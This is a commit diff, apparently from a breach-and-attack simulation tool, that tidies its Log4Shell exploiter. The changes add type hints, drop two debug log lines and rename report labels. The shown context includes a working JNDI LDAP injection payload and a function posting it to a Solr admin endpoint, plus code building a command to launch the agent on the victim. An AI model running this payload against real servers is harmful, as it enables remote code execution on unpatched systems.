Agent, Island: Minor changes to Log4Shell
Return types, removing logging from solr service and change Log4j to Log4Shell in Island reporting
This commit is contained in:
parent
311a721880
commit
51bf553fb5
|
@ -116,12 +116,12 @@ class Log4ShellExploiter(WebRCE):
|
||||||
|
|
||||||
self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||||
|
|
||||||
def _build_ldap_payload(self):
|
def _build_ldap_payload(self) -> str:
|
||||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
|
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
|
||||||
|
|
||||||
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
||||||
def _build_command(self, path, http_path):
|
def _build_command(self, path, http_path) -> str:
|
||||||
# Build command to execute
|
# Build command to execute
|
||||||
monkey_cmd = build_monkey_commandline(
|
monkey_cmd = build_monkey_commandline(
|
||||||
self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
|
self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
|
||||||
|
|
|
@ -15,8 +15,6 @@ class SolrExploit(IServiceExploiter):
|
||||||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||||
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
|
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
|
||||||
try:
|
try:
|
||||||
logger.debug("Sending malicious SOLR log4j request")
|
|
||||||
requests.post(url, timeout=5, verify=False) # noqa DUO123
|
requests.post(url, timeout=5, verify=False) # noqa DUO123
|
||||||
logger.debug("Request sent")
|
|
||||||
except requests.ReadTimeout as e:
|
except requests.ReadTimeout as e:
|
||||||
logger.debug(f"Log4shell request failed {e}")
|
logger.debug(f"Log4shell request failed {e}")
|
||||||
|
|
|
@ -55,7 +55,7 @@ class ExploiterDescriptorEnum(Enum):
|
||||||
POWERSHELL = ExploiterDescriptor(
|
POWERSHELL = ExploiterDescriptor(
|
||||||
"PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
|
"PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
|
||||||
)
|
)
|
||||||
LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4j Exploiter", Log4ShellProcessor)
|
LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4Shell Exploiter", Log4ShellProcessor)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_by_class_name(class_name: str) -> ExploiterDescriptor:
|
def get_by_class_name(class_name: str) -> ExploiterDescriptor:
|
||||||
|
|
|
@ -2,19 +2,19 @@ import React from 'react';
|
||||||
import CollapsibleWellComponent from '../CollapsibleWell';
|
import CollapsibleWellComponent from '../CollapsibleWell';
|
||||||
|
|
||||||
export function log4shellIssueOverview() {
|
export function log4shellIssueOverview() {
|
||||||
return (<li>Some servers are vulnerable to log4shell remote code execution exploit.</li>)
|
return (<li>Some servers are vulnerable to the Log4Shell remote code execution exploit.</li>)
|
||||||
}
|
}
|
||||||
|
|
||||||
export function log4shellIssueReport(issue) {
|
export function log4shellIssueReport(issue) {
|
||||||
return (
|
return (
|
||||||
<>
|
<>
|
||||||
Upgrade the log4j component to version 2.15.0 or later.
|
Upgrade the Apache Log4j component to version 2.15.0 or later.
|
||||||
<CollapsibleWellComponent>
|
<CollapsibleWellComponent>
|
||||||
The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span
|
The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span
|
||||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span
|
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span
|
||||||
className="badge badge-danger">log4shell remote code execution</span> attack.
|
className="badge badge-danger">the Log4Shell remote code execution</span> attack.
|
||||||
<br/>
|
<br/>
|
||||||
The attack was made possible due to an old version of log4j component.
|
The attack was made possible due to an old version of Apache Log4j component.
|
||||||
</CollapsibleWellComponent>
|
</CollapsibleWellComponent>
|
||||||
</>
|
</>
|
||||||
);
|
);
|
||||||
|
|
Loading…
Reference in New Issue